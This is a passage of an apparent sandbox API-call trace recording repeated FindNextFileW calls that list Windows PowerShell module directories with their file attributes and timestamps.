ftLastAccessTime.dwLowDateTime=0xbe8d4b97, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8d4b97, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Appx", cAlternateFileName="")) returned 1 [0176.680] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de390 | out: lpFindFileData=0x1b7de390*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6f8bffde, ftCreationTime.dwHighDateTime=0x1d112f2, ftLastAccessTime.dwLowDateTime=0x6f8bffde, ftLastAccessTime.dwHighDateTime=0x1d112f2, ftLastWriteTime.dwLowDateTime=0x6f8bffde, ftLastWriteTime.dwHighDateTime=0x1d112f2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="AssignedAccess", cAlternateFileName="ASSIGN~1")) returned 1 [0176.681] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de390 | out: lpFindFileData=0x1b7de390*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8d4b97, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8d4b97, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="BitLocker", cAlternateFileName="BITLOC~1")) returned 1 [0176.681] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de390 | out: lpFindFileData=0x1b7de390*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa22f14e, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa22f14e, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="BitsTransfer", cAlternateFileName="BITSTR~1")) returned 1 [0176.681] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de390 | out: lpFindFileData=0x1b7de390*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x6f8bffde, ftCreationTime.dwHighDateTime=0x1d112f2, ftLastAccessTime.dwLowDateTime=0x6f8e6231, ftLastAccessTime.dwHighDateTime=0x1d112f2, ftLastWriteTime.dwLowDateTime=0x6f8e6231, ftLastWriteTime.dwHighDateTime=0x1d112f2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="BranchCache", cAlternateFileName="BRANCH~1")) returned 1 [0176.681] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de390 | out: lpFindFileData=0x1b7de390*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa22f14e, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa22f14e, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="CimCmdlets", cAlternateFileName="CIMCMD~1")) returned 1 [0176.681] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de390 | out: lpFindFileData=0x1b7de390*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa255399, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa255399, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Defender", cAlternateFileName="")) returned 1 [0176.682] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de390 | out: lpFindFileData=0x1b7de390*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x132219b, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x132219b, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="DirectAccessClientComponents", cAlternateFileName="DIRECT~1")) returned 1 [0176.682] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de390 | out: lpFindFileData=0x1b7de390*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8d4b97, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8d4b97, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Dism", cAlternateFileName="")) returned 1 [0176.682] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de390 | out: lpFindFileData=0x1b7de390*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa2c7aa8, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa2c7aa8, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="DnsClient", cAlternateFileName="DNSCLI~1")) returned 1 [0176.682] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de390 | out: lpFindFileData=0x1b7de390*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa2edd07, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa2edd07, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="EventTracingManagement", cAlternateFileName="EVENTT~1")) returned 1 [0176.682] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de390 | out: lpFindFileData=0x1b7de390*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa2edd07, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa2edd07, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="International", cAlternateFileName="INTERN~1")) returned 1 [0176.683] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de390 | out: lpFindFileData=0x1b7de390*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa313f59, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa313f59, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="iSCSI", cAlternateFileName="")) returned 1 [0176.683] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de390 | out: lpFindFileData=0x1b7de390*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa313f59, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa313f59, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ISE", cAlternateFileName="")) returned 1 [0176.683] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de390 | out: lpFindFileData=0x1b7de390*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8d4b97, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8d4b97, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Kds", cAlternateFileName="")) returned 1 [0176.683] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de390 | out: lpFindFileData=0x1b7de390*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8d4b97, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8d4b97, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.Archive", cAlternateFileName="MICROS~1.ARC")) returned 1 [0176.683] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de390 | out: lpFindFileData=0x1b7de390*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa33a1b4, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa33a1b4, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.Diagnostics", cAlternateFileName="MICROS~1.DIA")) returned 1 [0176.683] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de390 | out: lpFindFileData=0x1b7de390*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa33a1b4, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa33a1b4, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.Host", cAlternateFileName="MICROS~1.HOS")) returned 1 [0176.684] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de390 | out: lpFindFileData=0x1b7de390*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa33a1b4, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa33a1b4, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.Management", cAlternateFileName="MICROS~1.MAN")) returned 1 [0176.684] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de390 | out: lpFindFileData=0x1b7de390*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8d4b97, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8d4b97, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.ODataUtils", cAlternateFileName="MICROS~1.ODA")) returned 1 [0176.684] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de390 | out: lpFindFileData=0x1b7de390*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa33a1b4, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa33a1b4, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.Security", cAlternateFileName="MICROS~1.SEC")) returned 1 [0176.684] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de390 | out: lpFindFileData=0x1b7de390*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa36040a, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa36040a, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.Utility", cAlternateFileName="MICROS~1.UTI")) returned 1 [0176.684] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de390 | out: lpFindFileData=0x1b7de390*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa36040a, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa36040a, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.WSMan.Management", cAlternateFileName="MICROS~2.MAN")) returned 1 [0176.685] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de390 | out: lpFindFileData=0x1b7de390*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa386669, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa386669, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="MMAgent", cAlternateFileName="")) returned 1 [0176.685] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de390 | out: lpFindFileData=0x1b7de390*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8fadd5, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8fadd5, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="MsDtc", cAlternateFileName="")) returned 1 [0176.685] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de390 | out: lpFindFileData=0x1b7de390*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa4b7931, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa4b7931, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetAdapter", cAlternateFileName="NETADA~1")) returned 1 [0176.685] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de390 | out: lpFindFileData=0x1b7de390*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa4b7931, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa4b7931, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetConnection", cAlternateFileName="NETCON~1")) returned 1 [0176.685] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de390 | out: lpFindFileData=0x1b7de390*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa503e3d, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa503e3d, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetEventPacketCapture", cAlternateFileName="NETEVE~1")) returned 1 [0176.686] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de390 | out: lpFindFileData=0x1b7de390*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13483f1, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa52a044, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa52a044, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetLbfo", cAlternateFileName="")) returned 1 [0176.686] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de390 | out: lpFindFileData=0x1b7de390*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13483f1, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa52a044, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa52a044, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetNat", cAlternateFileName="")) returned 1 [0176.686] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de390 | out: lpFindFileData=0x1b7de390*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13483f1, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa550297, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa550297, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetQos", cAlternateFileName="")) returned 1 [0176.687] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de390 | out: lpFindFileData=0x1b7de390*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13483f1, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8fadd5, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8fadd5, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetSecurity", cAlternateFileName="NETSEC~1")) returned 1 [0176.687] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de390 | out: lpFindFileData=0x1b7de390*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13483f1, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa59c748, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa59c748, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetSwitchTeam", cAlternateFileName="NETSWI~1")) returned 1 [0176.687] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de390 | out: lpFindFileData=0x1b7de390*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13483f1, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa5c29a2, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa5c29a2, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetTCPIP", cAlternateFileName="")) returned 1 [0176.687] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de390 | out: lpFindFileData=0x1b7de390*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13483f1, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x13483f1, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x13483f1, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetworkConnectivityStatus", cAlternateFileName="NETWOR~1")) returned 1 [0176.688] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de390 | out: lpFindFileData=0x1b7de390*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13483f1, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8fadd5, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8fadd5, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetworkSwitchManager", cAlternateFileName="NETWOR~2")) returned 1 [0176.688] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de390 | out: lpFindFileData=0x1b7de390*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13483f1, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x13948a6, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x13948a6, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetworkTransition", cAlternateFileName="NETWOR~3")) returned 1 [0176.688] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de390 | out: lpFindFileData=0x1b7de390*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13948a6, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa5e8c01, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa5e8c01, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="PcsvDevice", cAlternateFileName="PCSVDE~1")) returned 1 [0176.688] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de390 | out: lpFindFileData=0x1b7de390*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x13948a6, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8fadd5, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8fadd5, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="PKI", cAlternateFileName="")) returned 1 [0176.689] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de390 | out: lpFindFileData=0x1b7de390*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13948a6, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa5e8c01, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa5e8c01, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="PnpDevice", cAlternateFileName="PNPDEV~1")) returned 1 [0176.689] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de390 | out: lpFindFileData=0x1b7de390*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13948a6, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa6350b6, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa6350b6, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="PrintManagement", cAlternateFileName="PRINTM~1")) returned 1 [0176.689] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de390 | out: lpFindFileData=0x1b7de390*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x13948a6, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe921041, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe921041, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="PSDesiredStateConfiguration", cAlternateFileName="PSDESI~1")) returned 1 [0176.689] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de390 | out: lpFindFileData=0x1b7de390*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13baafd, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa6f3c72, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa6f3c72, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="PSDiagnostics", cAlternateFileName="PSDIAG~1")) returned 1 [0176.689] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de390 | out: lpFindFileData=0x1b7de390*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x13baafd, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa6f3c72, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa6f3c72, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="PSScheduledJob", cAlternateFileName="PSSCHE~1")) returned 1 [0176.689] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de390 | out: lpFindFileData=0x1b7de390*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x13baafd, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa6f3c72, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa6f3c72, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="PSWorkflow", cAlternateFileName="PSWORK~1")) returned 1 [0176.690] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de390 | out: lpFindFileData=0x1b7de390*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x13baafd, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa6f3c72, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa6f3c72, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="PSWorkflowUtility", cAlternateFileName="PSWORK~2")) returned 1 [0176.690] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de390 | out: lpFindFileData=0x1b7de390*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13baafd, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa719ec9, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa719ec9, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ScheduledTasks", cAlternateFileName="SCHEDU~1")) returned 1 [0176.690] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de390 | out: lpFindFileData=0x1b7de390*(dwFileAttributes=0x14, 